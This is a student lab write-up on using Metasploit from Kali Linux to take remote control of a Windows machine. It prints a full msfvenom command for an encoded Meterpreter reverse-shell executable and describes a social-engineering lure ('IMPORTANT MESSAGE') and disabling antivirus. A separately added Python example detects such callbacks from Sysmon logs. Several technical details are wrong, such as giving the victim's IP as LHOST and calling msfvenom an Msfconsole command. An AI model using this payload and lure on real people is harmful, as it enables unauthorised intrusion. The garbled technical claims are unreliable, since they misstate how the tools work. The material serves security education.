Ethical Hacking: Metasploit Framework for Windows Penetration Test

Added on  2023/06/04

Practical Assignment
AI Summary
This practical assignment details the process of ethical hacking using the Metasploit framework on Kali Linux to penetrate a Windows operating system. The experiment involves setting up a controlled environment with Kali Linux and a target Windows machine on the same NAT network. The process includes creating an executable file with a reverse TCP payload, sending it to the target machine, and tricking the user into executing it. Upon execution, the Metasploit listener gains full control of the victim's machine, demonstrating remote access capabilities such as file manipulation and directory removal. The assignment highlights the importance of cybersecurity awareness and the potential risks associated with unverified files.
Running Head: ICT ETHICAL HACKING (EXPLOITS) 1
KALI LINUX EXPLOIT USING METASPLOIT
Student name
Institution Affiliation
Facilitator
Course
Date
Introduction
In an era in which cybersecurity threats have become a major concern for information systems,
knowledge of the common penetration techniques that attackers can use to compromise
organizational systems is of paramount importance. It enables IT professionals to test
and implement the measures necessary to protect the organization's data resources.
In our workshop session on common exploitation approaches used by attackers, we experimented
with Metasploit exploitation on the Kali Linux platform. The targeted machine, however, was supposed to
be running the Windows operating system, regardless of version (Windows XP, 7, 8, 8.1 and 10).
The main aim of our experiment was to learn how attackers are able to penetrate machines
running Windows remotely and without the consent of the machine's main user (Dieterle, 2016).
Metasploit is a project which enables attackers to carry out penetration of a victim's machine
through the development of ID signatures. To achieve that, the tool enables attackers to come up with
exploit code which is then executed on targeted remote machines, allowing them to get into the machine
with full user rights (Holik, Horalek, Marik, Neradova & Zitta, 2014, p. 241). To set up our penetration
test experiment, we required the Metasploit framework with full Ruby packages installed on the Kali
Linux machine, and two computers running different operating systems (one Kali Linux and the
other Windows). The two machines were placed on the same NAT network so that we could retrieve their
IP addresses and port numbers easily. Also, since antivirus software on the targeted machine would have hindered us
from achieving our exploitation objective, we made sure that the Windows machine did not have
any antivirus software running on it.
The penetration test consisted entirely of running commands on the Kali Linux
machine, and the main Metasploit command we used was Msfconsole, because of its flexibility and
other favorable features supporting the Metasploit framework. To gain access to the second
machine, we needed to know the machine's IP address and any of its free port numbers. To acquire the
two, we simply used Netcut software, since the two machines were operating on the
same NAT network (Muniz, 2013).
Getting down to the actual work, we started by creating executable files whose unique identifiers were
essentially the IP address and the port number we had obtained from the targeted machine, using the
Msfconsole command "msfvenom -p windows/meterpreter/reverse_tcp LHOST= (IP address of windows
machine) LPORT= (PORT in the windows machine) -f exe -e x86/shikata_ga_nai -i 10 > /root/desktop/
(desktop name).exe". The next step was to make sure that the file was sent to the targeted machine and to trick
the user into opening it. So we saved the folder as "IMPORTANT MESSAGE", to be sure that the user
would be tempted to open it.
After sending the file, we activated our Metasploit framework to listen for the file using the
Msfconsole command "exploit". In this state, the "meterpreter" would be activated on our Kali Linux
machine automatically when the targeted user opened the sent file, giving us access to his
or her machine immediately. So, after the file was opened on the second machine, we automatically
gained access to the victim's machine with full control rights, just like a person logged into the
machine physically. We could carry out several operations such as editing files, deleting files, viewing
folders and removing some directories (Weidman, 2014). That clearly showed that we had gotten
into the machine remotely without the owner's consent.
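The sequence described above (a user opens a received executable and the session is established as soon as it runs) leaves a recognizable trace on the Windows side. The following is an added example, not part of the original assignment: it correlates process-creation and outbound-connection records whose field names follow Sysmon Event ID 1 and Event ID 3. The sample records, the list of user-writable folders and the 30-second window are assumptions made for illustration.

```python
from datetime import datetime, timedelta

# Constructed records shaped like Sysmon Event ID 1 (process creation) and
# Event ID 3 (network connection); every value below is invented.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": "2023-06-04 10:15:02.120", "ProcessGuid": "{A1}",
     "Image": r"C:\Users\lab\Desktop\IMPORTANT MESSAGE\message.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "UtcTime": "2023-06-04 10:15:03.480", "ProcessGuid": "{A1}",
     "Initiated": "true", "DestinationIp": "192.0.2.10", "DestinationPort": "8443"},
    {"EventID": 1, "UtcTime": "2023-06-04 10:16:00.000", "ProcessGuid": "{B2}",
     "Image": r"C:\Program Files\Browser\browser.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "UtcTime": "2023-06-04 10:16:01.000", "ProcessGuid": "{B2}",
     "Initiated": "true", "DestinationIp": "198.51.100.7", "DestinationPort": "443"},
    {"EventID": 1, "UtcTime": "2023-06-04 10:20:00.000", "ProcessGuid": "{C3}",
     "Image": r"C:\Users\lab\Downloads\setup.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 3, "UtcTime": "2023-06-04 10:35:00.000", "ProcessGuid": "{C3}",
     "Initiated": "true", "DestinationIp": "198.51.100.9", "DestinationPort": "443"},
]

# Assumed heuristics: folders a user can drop files into, and how soon after
# launch an outbound connection counts as "on execution".
USER_WRITABLE = ("\\desktop\\", "\\downloads\\", "\\appdata\\local\\temp\\")
WINDOW = timedelta(seconds=30)

def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S.%f")

def find_suspect_callbacks(events):
    """Alert on programs started from user-writable folders that initiate an
    outbound connection within WINDOW of starting."""
    started, alerts = {}, []
    for ev in sorted(events, key=lambda e: parse_time(e["UtcTime"])):
        if ev["EventID"] == 1:
            path = ev["Image"].lower()
            if "\\users\\" in path and any(d in path for d in USER_WRITABLE):
                started[ev["ProcessGuid"]] = ev
        elif ev["EventID"] == 3 and ev.get("Initiated") == "true":
            proc = started.get(ev["ProcessGuid"])
            if proc and parse_time(ev["UtcTime"]) - parse_time(proc["UtcTime"]) <= WINDOW:
                alerts.append({"image": proc["Image"], "parent": proc["ParentImage"],
                               "dest": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'})
    return alerts

if __name__ == "__main__":
    for alert in find_suspect_callbacks(SAMPLE_EVENTS):
        print(alert)
```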
References
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent Publishing
Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective penetration
testing with Metasploit framework and methodologies. In Computational Intelligence and
Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp. 237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd.
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.